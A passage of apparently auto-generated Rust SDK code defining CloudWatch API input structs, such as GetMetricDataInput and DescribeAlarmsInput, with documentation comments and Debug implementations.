impl std::fmt::Debug for PutAnomalyDetectorInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutAnomalyDetectorInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("stat", &self.stat);
formatter.field("configuration", &self.configuration);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListTagsForResourceInput {
/// <p>The ARN of the CloudWatch resource that you want to view tags for.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub resource_arn: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ListTagsForResourceInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListTagsForResourceInput");
formatter.field("resource_arn", &self.resource_arn);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListMetricStreamsInput {
/// <p>Include this value, if it was returned by the previous call, to get the next set of metric streams.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The maximum number of results to return in one operation.</p>
pub max_results: std::option::Option<i32>,
}
impl std::fmt::Debug for ListMetricStreamsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListMetricStreamsInput");
formatter.field("next_token", &self.next_token);
formatter.field("max_results", &self.max_results);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListMetricsInput {
/// <p>The metric namespace to filter against. Only the namespace that matches exactly
/// will be returned.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The name of the metric to filter against. Only the metrics with names that match exactly
/// will be returned.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The dimensions to filter against. Only the dimensions that match exactly
/// will be returned.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::DimensionFilter>>,
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>To filter the results to show only metrics that have had data points published
/// in the past three hours, specify this parameter
/// with a value of <code>PT3H</code>. This is the only valid value
/// for this parameter.</p>
/// <p>The results that are returned are an approximation of the value you specify. There
/// is a low probability that the returned results include metrics with last published
/// data as much as 40 minutes more than the specified time interval.</p>
pub recently_active: std::option::Option<crate::model::RecentlyActive>,
}
impl std::fmt::Debug for ListMetricsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListMetricsInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("next_token", &self.next_token);
formatter.field("recently_active", &self.recently_active);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListDashboardsInput {
/// <p>If you specify this parameter, only
/// the dashboards with names starting with the specified string are listed. The maximum length is 255, and
/// valid characters are A-Z, a-z, 0-9, ".", "-", and "_".
/// </p>
pub dashboard_name_prefix: std::option::Option<std::string::String>,
/// <p>The token returned by a previous call to indicate that there is more data available.</p>
pub next_token: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ListDashboardsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListDashboardsInput");
formatter.field("dashboard_name_prefix", &self.dashboard_name_prefix);
formatter.field("next_token", &self.next_token);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricWidgetImageInput {
/// <p>A JSON string that defines the bitmap graph to be retrieved. The string includes the
/// metrics to include in the graph, statistics, annotations, title, axis limits, and so on.
/// You can include only one <code>MetricWidget</code> parameter in each <code>GetMetricWidgetImage</code> call.</p>
/// <p>For more information about the syntax of <code>MetricWidget</code> see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Metric-Widget-Structure.html">GetMetricWidgetImage: Metric Widget Structure and Syntax</a>.</p>
/// <p>If any metric on the graph could not load all the requested data points, an orange triangle with an exclamation
/// point appears next to the graph legend.</p>
pub metric_widget: std::option::Option<std::string::String>,
/// <p>The format of the resulting image. Only PNG images are supported.</p>
/// <p>The default is <code>png</code>. If you specify <code>png</code>, the API returns an HTTP response with the
/// content-type set to <code>text/xml</code>. The image data is in a <code>MetricWidgetImage</code>
/// field. For example:</p>
/// <p>
/// <code>
/// <GetMetricWidgetImageResponse xmlns=<URLstring>></code>
/// </p>
/// <p>
/// <code> <GetMetricWidgetImageResult></code>
/// </p>
/// <p>
/// <code> <MetricWidgetImage></code>
/// </p>
/// <p>
/// <code> iVBORw0KGgoAAAANSUhEUgAAAlgAAAGQEAYAAAAip...</code>
/// </p>
/// <p>
/// <code> </MetricWidgetImage></code>
/// </p>
/// <p>
/// <code> </GetMetricWidgetImageResult></code>
/// </p>
/// <p>
/// <code> <ResponseMetadata></code>
/// </p>
/// <p>
/// <code> <RequestId>6f0d4192-4d42-11e8-82c1-f539a07e0e3b</RequestId></code>
/// </p>
/// <p>
/// <code> </ResponseMetadata></code>
/// </p>
/// <p>
/// <code></GetMetricWidgetImageResponse></code>
/// </p>
/// <p>The <code>image/png</code> setting is intended only for custom HTTP requests. For most
/// use cases, and all actions using an AWS SDK, you should use <code>png</code>. If you specify
/// <code>image/png</code>, the HTTP response has a content-type set to <code>image/png</code>,
/// and the body of the response is a PNG image. </p>
pub output_format: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetMetricWidgetImageInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricWidgetImageInput");
formatter.field("metric_widget", &self.metric_widget);
formatter.field("output_format", &self.output_format);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricStreamInput {
/// <p>The name of the metric stream to retrieve information about.</p>
pub name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetMetricStreamInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricStreamInput");
formatter.field("name", &self.name);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricStatisticsInput {
/// <p>The namespace of the metric, with or without spaces.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The name of the metric, with or without spaces.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The dimensions. If the metric contains multiple dimensions, you must include a value for each dimension. CloudWatch treats each unique combination of dimensions as a separate metric.
/// If a specific combination of dimensions was not published, you can't retrieve statistics for it.
/// You must specify the same dimensions that were used when the metrics were created. For an example,
/// see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#dimension-combinations">Dimension Combinations</a> in the <i>Amazon CloudWatch User Guide</i>. For more information about specifying dimensions, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/publishingMetrics.html">Publishing Metrics</a> in the
/// <i>Amazon CloudWatch User Guide</i>.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The time stamp that determines the first data point to return. Start times are
/// evaluated relative to the time that CloudWatch receives the request.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-03T23:00:00Z).</p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
pub start_time: std::option::Option<smithy_types::Instant>,
/// <p>The time stamp that determines the last data point to return.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-10T23:00:00Z).</p>
pub end_time: std::option::Option<smithy_types::Instant>,
/// <p>The granularity, in seconds, of the returned data points. For metrics with regular resolution, a period can
/// be as short as one minute (60 seconds) and must be a multiple of 60. For high-resolution metrics that are collected
/// at intervals of less than one minute, the period can be 1, 5, 10, 30, 60, or any multiple of 60. High-resolution metrics
/// are those metrics stored by a <code>PutMetricData</code> call that includes a <code>StorageResolution</code> of 1 second.</p>
    /// <p>If the <code>StartTime</code> parameter specifies a time stamp that is greater than
    /// 3 hours ago, you must specify the period as follows or no data points in that time range are returned:</p>
/// <ul>
/// <li>
/// <p>Start time between 3 hours and 15 days ago - Use a multiple of 60 seconds (1 minute).</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Use a multiple of 300 seconds (5 minutes).</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Use a multiple of 3600 seconds (1 hour).</p>
/// </li>
/// </ul>
pub period: std::option::Option<i32>,
/// <p>The metric statistics, other than percentile. For percentile statistics,
/// use <code>ExtendedStatistics</code>. When calling <code>GetMetricStatistics</code>, you must
/// specify either <code>Statistics</code> or <code>ExtendedStatistics</code>, but not both.</p>
pub statistics: std::option::Option<std::vec::Vec<crate::model::Statistic>>,
/// <p>The percentile statistics. Specify values between p0.0 and p100. When calling <code>GetMetricStatistics</code>, you must
/// specify either <code>Statistics</code> or <code>ExtendedStatistics</code>, but not both. Percentile statistics are not
/// available for metrics when any of the metric values are negative numbers.</p>
pub extended_statistics: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The unit for a given metric.
/// If you omit <code>Unit</code>, all data that was collected with any unit is returned, along with the corresponding units that were specified
/// when the data was reported to CloudWatch. If you specify a unit, the operation returns only data that was collected with that unit specified.
/// If you specify a unit that does not match the data collected, the results of the operation are null. CloudWatch does not perform unit conversions.</p>
pub unit: std::option::Option<crate::model::StandardUnit>,
}
impl std::fmt::Debug for GetMetricStatisticsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricStatisticsInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("start_time", &self.start_time);
formatter.field("end_time", &self.end_time);
formatter.field("period", &self.period);
formatter.field("statistics", &self.statistics);
formatter.field("extended_statistics", &self.extended_statistics);
formatter.field("unit", &self.unit);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricDataInput {
/// <p>The metric queries to be returned. A single <code>GetMetricData</code> call can include as many as 500 <code>MetricDataQuery</code>
/// structures. Each of these structures can specify either a metric to retrieve, or a math expression to perform on retrieved data. </p>
pub metric_data_queries: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
/// <p>The time stamp indicating the earliest data to be returned.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp. </p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>StartTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>StartTime</code>.</p>
pub start_time: std::option::Option<smithy_types::Instant>,
/// <p>The time stamp indicating the latest data to be returned.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.</p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>EndTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>EndTime</code>.</p>
pub end_time: std::option::Option<smithy_types::Instant>,
/// <p>Include this value, if it was returned by the previous <code>GetMetricData</code> operation,
/// to get the next set of data points.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The order in which data points should be returned. <code>TimestampDescending</code> returns the newest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached. <code>TimestampAscending</code> returns the oldest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached.</p>
pub scan_by: std::option::Option<crate::model::ScanBy>,
/// <p>The maximum number of data points the request should return before paginating. If you omit
/// this, the default of 100,800 is used.</p>
pub max_datapoints: std::option::Option<i32>,
/// <p>This structure includes the <code>Timezone</code> parameter, which you can use
/// to specify your time zone so that the labels of returned data display the
/// correct time
/// for your time zone. </p>
pub label_options: std::option::Option<crate::model::LabelOptions>,
}
impl std::fmt::Debug for GetMetricDataInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricDataInput");
formatter.field("metric_data_queries", &self.metric_data_queries);
formatter.field("start_time", &self.start_time);
formatter.field("end_time", &self.end_time);
formatter.field("next_token", &self.next_token);
formatter.field("scan_by", &self.scan_by);
formatter.field("max_datapoints", &self.max_datapoints);
formatter.field("label_options", &self.label_options);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetInsightRuleReportInput {
/// <p>The name of the rule that you want to see data from.</p>
pub rule_name: std::option::Option<std::string::String>,
/// <p>The start time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub start_time: std::option::Option<smithy_types::Instant>,
/// <p>The end time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub end_time: std::option::Option<smithy_types::Instant>,
/// <p>The period, in seconds, to use for the statistics in the <code>InsightRuleMetricDatapoint</code> results.</p>
pub period: std::option::Option<i32>,
/// <p>The maximum number of contributors to include in the report. The range is 1 to 100. If you omit this, the default of 10 is used.</p>
pub max_contributor_count: std::option::Option<i32>,
/// <p>Specifies which metrics to use for aggregation of contributor values for the report. You can specify one or more
/// of the following metrics:</p>
/// <ul>
/// <li>
/// <p>
/// <code>UniqueContributors</code> -- the number of unique contributors for each data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>MaxContributorValue</code> -- the value of the top contributor for each data point. The identity of the
/// contributor might change for each data point in the graph.</p>
/// <p>If this rule aggregates by COUNT, the top contributor for each data point is the contributor with the
/// most occurrences in that period. If the rule aggregates by SUM, the top contributor is the contributor with the highest sum in the log field specified
/// by the rule's <code>Value</code>, during that period.</p>
/// </li>
/// <li>
/// <p>
/// <code>SampleCount</code> -- the number of data points matched by the rule.</p>
/// </li>
/// <li>
/// <p>
/// <code>Sum</code> -- the sum of the values from all contributors during the time period represented by that data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>Minimum</code> -- the minimum value from a single observation during the time period represented by that data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>Maximum</code> -- the maximum value from a single observation during the time period represented by that data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>Average</code> -- the average value from all contributors during the time period represented by that data point.</p>
/// </li>
/// </ul>
pub metrics: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>Determines what statistic to use to rank the contributors. Valid values are SUM and MAXIMUM.</p>
pub order_by: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetInsightRuleReportInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetInsightRuleReportInput");
formatter.field("rule_name", &self.rule_name);
formatter.field("start_time", &self.start_time);
formatter.field("end_time", &self.end_time);
formatter.field("period", &self.period);
formatter.field("max_contributor_count", &self.max_contributor_count);
formatter.field("metrics", &self.metrics);
formatter.field("order_by", &self.order_by);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetDashboardInput {
/// <p>The name of the dashboard to be described.</p>
pub dashboard_name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetDashboardInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetDashboardInput");
formatter.field("dashboard_name", &self.dashboard_name);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EnableInsightRulesInput {
/// <p>An array of the rule names to enable. If you need to find out the names of your rules, use <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DescribeInsightRules.html">DescribeInsightRules</a>.</p>
pub rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for EnableInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("EnableInsightRulesInput");
formatter.field("rule_names", &self.rule_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EnableAlarmActionsInput {
/// <p>The names of the alarms.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for EnableAlarmActionsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("EnableAlarmActionsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DisableInsightRulesInput {
/// <p>An array of the rule names to disable. If you need to find out the names of your rules, use <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DescribeInsightRules.html">DescribeInsightRules</a>.</p>
pub rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DisableInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DisableInsightRulesInput");
formatter.field("rule_names", &self.rule_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DisableAlarmActionsInput {
/// <p>The names of the alarms.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DisableAlarmActionsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DisableAlarmActionsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeInsightRulesInput {
/// <p>Include this value, if it was returned by the previous operation, to get the next set of rules.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The maximum number of results to return in one operation. If you omit this
/// parameter, the default of 500 is used.</p>
pub max_results: std::option::Option<i32>,
}
impl std::fmt::Debug for DescribeInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeInsightRulesInput");
formatter.field("next_token", &self.next_token);
formatter.field("max_results", &self.max_results);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAnomalyDetectorsInput {
/// <p>Use the token returned by the previous operation to request the next page of results.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The maximum number of results to return in one operation. The maximum
/// value that you can specify is 100.</p>
/// <p>To retrieve the remaining results, make another call with the returned
/// <code>NextToken</code> value. </p>
pub max_results: std::option::Option<i32>,
/// <p>Limits the results to only the anomaly detection models that
/// are associated with the specified namespace.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric name. If there are multiple metrics with this name in different
/// namespaces that have anomaly detection models, they're all returned.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric dimensions. If there are multiple metrics that have these dimensions
/// and have anomaly detection models associated, they're all returned.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
}
impl std::fmt::Debug for DescribeAnomalyDetectorsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAnomalyDetectorsInput");
formatter.field("next_token", &self.next_token);
formatter.field("max_results", &self.max_results);
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAlarmsForMetricInput {
/// <p>The name of the metric.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The namespace of the metric.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The statistic for the metric, other than percentiles.
/// For percentile statistics, use <code>ExtendedStatistics</code>.</p>
pub statistic: std::option::Option<crate::model::Statistic>,
/// <p>The percentile statistic for the metric. Specify a value between
/// p0.0 and p100.</p>
pub extended_statistic: std::option::Option<std::string::String>,
/// <p>The dimensions associated with the metric. If the metric has any associated
/// dimensions, you must specify them in order for the call to succeed.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The period, in seconds, over which the statistic is applied.</p>
pub period: std::option::Option<i32>,
/// <p>The unit for the metric.</p>
pub unit: std::option::Option<crate::model::StandardUnit>,
}
impl std::fmt::Debug for DescribeAlarmsForMetricInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAlarmsForMetricInput");
formatter.field("metric_name", &self.metric_name);
formatter.field("namespace", &self.namespace);
formatter.field("statistic", &self.statistic);
formatter.field("extended_statistic", &self.extended_statistic);
formatter.field("dimensions", &self.dimensions);
formatter.field("period", &self.period);
formatter.field("unit", &self.unit);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAlarmsInput {
/// <p>The names of the alarms to retrieve information about.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>An alarm name prefix. If you specify this parameter, you receive information about all alarms that have names
/// that start with this prefix.</p>
/// <p>If this parameter
/// is specified, you cannot specify <code>AlarmNames</code>.</p>
pub alarm_name_prefix: std::option::Option<std::string::String>,
/// <p>Use this parameter to specify whether you want the operation to return metric alarms or composite alarms. If you omit this parameter,
/// only metric alarms are returned.</p>
pub alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
/// <p>If you use this parameter and specify the name of a composite alarm, the operation returns
/// information about the "children" alarms
/// of the alarm you specify. These are the metric alarms and composite alarms referenced in the
/// <code>AlarmRule</code> field of the composite alarm that you specify in
/// <code>ChildrenOfAlarmName</code>. Information about the composite alarm that you name in
/// <code>ChildrenOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ChildrenOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you
/// receive a validation
/// error.</p>
/// <note>
/// <p>Only the <code>Alarm Name</code>, <code>ARN</code>, <code>StateValue</code> (OK/ALARM/INSUFFICIENT_DATA), and <code>StateUpdatedTimestamp</code>
/// information are returned by this operation
/// when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub children_of_alarm_name: std::option::Option<std::string::String>,
/// <p>If you use this parameter and specify the name of a metric or composite alarm, the operation returns
/// information about the "parent" alarms
/// of the alarm you specify. These are the composite alarms that have <code>AlarmRule</code>
/// parameters that reference
/// the alarm named in <code>ParentsOfAlarmName</code>. Information about the alarm that you specify in
/// <code>ParentsOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ParentsOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you receive a validation
/// error.</p>
/// <note>
/// <p>Only the Alarm Name and ARN are returned by this operation when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub parents_of_alarm_name: std::option::Option<std::string::String>,
/// <p>Specify this parameter to receive information only about alarms that are currently in the state that you specify.</p>
pub state_value: std::option::Option<crate::model::StateValue>,
/// <p>Use this parameter to filter the results of the operation to only those alarms that
/// use a certain alarm action. For example, you could specify the ARN of an SNS topic to find all
/// alarms that send notifications to that topic.</p>
pub action_prefix: std::option::Option<std::string::String>,
/// <p>The maximum number of alarm descriptions to retrieve.</p>
pub max_records: std::option::Option<i32>,
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub next_token: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DescribeAlarmsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAlarmsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.field("alarm_name_prefix", &self.alarm_name_prefix);
formatter.field("alarm_types", &self.alarm_types);
formatter.field("children_of_alarm_name", &self.children_of_alarm_name);
formatter.field("parents_of_alarm_name", &self.parents_of_alarm_name);
formatter.field("state_value", &self.state_value);
formatter.field("action_prefix", &self.action_prefix);
formatter.field("max_records", &self.max_records);
formatter.field("next_token", &self.next_token);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAlarmHistoryInput {
/// <p>The name of the alarm.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>Use this parameter to specify whether you want the operation to return metric alarms or composite alarms. If you omit this parameter,
/// only metric alarms are returned.</p>
pub alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
/// <p>The type of alarm histories to retrieve.</p>
pub history_item_type: std::option::Option<crate::model::HistoryItemType>,
/// <p>The starting date to retrieve alarm history.</p>
pub start_date: std::option::Option<smithy_types::Instant>,
/// <p>The ending date to retrieve alarm history.</p>
pub end_date: std::option::Option<smithy_types::Instant>,
/// <p>The maximum number of alarm history records to retrieve.</p>
pub max_records: std::option::Option<i32>,
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub next_token: std::option::Option<std::string::String>,
    /// <p>Specifies whether to return the newest or oldest alarm history first. Specify <code>TimestampDescending</code> to have the newest
    /// event history returned first, and specify <code>TimestampAscending</code> to have the oldest history returned first.</p>
pub scan_by: std::option::Option<crate::model::ScanBy>,
}
impl std::fmt::Debug for DescribeAlarmHistoryInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAlarmHistoryInput");
formatter.field("alarm_name", &self.alarm_name);
formatter.field("alarm_types", &self.alarm_types);
formatter.field("history_item_type", &self.history_item_type);
formatter.field("start_date", &self.start_date);
formatter.field("end_date", &self.end_date);
formatter.field("max_records", &self.max_records);
formatter.field("next_token", &self.next_token);
formatter.field("scan_by", &self.scan_by);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteMetricStreamInput {
/// <p>The name of the metric stream to delete.</p>
pub name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DeleteMetricStreamInput {
